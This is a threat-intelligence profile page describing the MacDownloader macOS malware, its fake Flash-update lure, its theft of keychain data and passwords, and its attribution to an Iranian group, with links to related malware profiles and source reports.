Macdownloader

Malware Profile Updated 3 months ago
Download STIX
Preview STIX
MacDownloader is a malicious software (malware) believed to have been created by Iranian hackers, specifically targeting the US defense industry. The malware was first observed in an active stage linked from a website impersonating the aerospace firm "United Technologies Corporation," a site thought to be maintained by Iranian actors for spreading Windows malware. This deceptive site would trick users into downloading a fake Adobe Flash update, which instead of being a legitimate version of Flash, was either Windows or Mac malware based on the detected operating system. Once downloaded and run, the user's device becomes infected with MacDownloader. The primary function of MacDownloader is to harvest information from the infected system, including details from the user's active keychains. Keychains store sensitive data such as usernames, passwords, PINs, and credit card numbers. This harvested information is then uploaded to the command and control server (C2). The malware also documents running processes, installed applications, and acquires the username and password through a fake System Preferences dialog. When the user is prompted to click to “remove” the adware, MacDownloader attempts to transmit this stolen data to a remote server. Proofpoint, a cybersecurity company, attributes the attack to the Iranian group with high confidence, based on code similarities between GorjolEcho and NokNok and malware previously attributed to the group, including GhostEcho, CharmPower, and MacDownloader. As noted by cybersecurity researchers Claudio and Collin, MacDownloader infections typically begin with a phishing email. The malware represents a significant threat due to its ability to steal sensitive personal information and its targeted focus on the defense industry.
What's your take? (Question 1 of 5)
Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
IDVotesProfile Description
GorjolEcho
1
GorjolEcho is a malicious software, or malware, linked to the Iranian group TA453 and identified by Proofpoint researchers. This sophisticated backdoor malware is designed to infiltrate computer systems, establish persistence, and exfiltrate information to command-and-control servers. The stealthy n
Noknok
1
NokNok is a malicious software (malware) developed by the Iranian hacking group APT35, also known as Charming Kitten. It was discovered after the group targeted a US-based nuclear security expert with a sophisticated phishing attack. The attackers initiated several non-threatening email interactions
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Malware
Windows
Spearphishing
Iran
Proofpoint
Dropper
Phishing
Associated Malware
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
No associations to display
Associated Threat Actors
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
No associations to display
Associated Vulnerabilities
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
No associations to display
Source Document References
Information about the Macdownloader Malware was read from the documents corpus below. This display is limited to 20 results, create a free account to see more
SourceCreatedAtTitle
CERT-EU
a year ago
Iranian Cyberspies Target US-Based Think Tank With New macOS Malware
MITRE
a year ago
Mac Malware of 2017
CERT-EU
a year ago
All the Mac malware we know about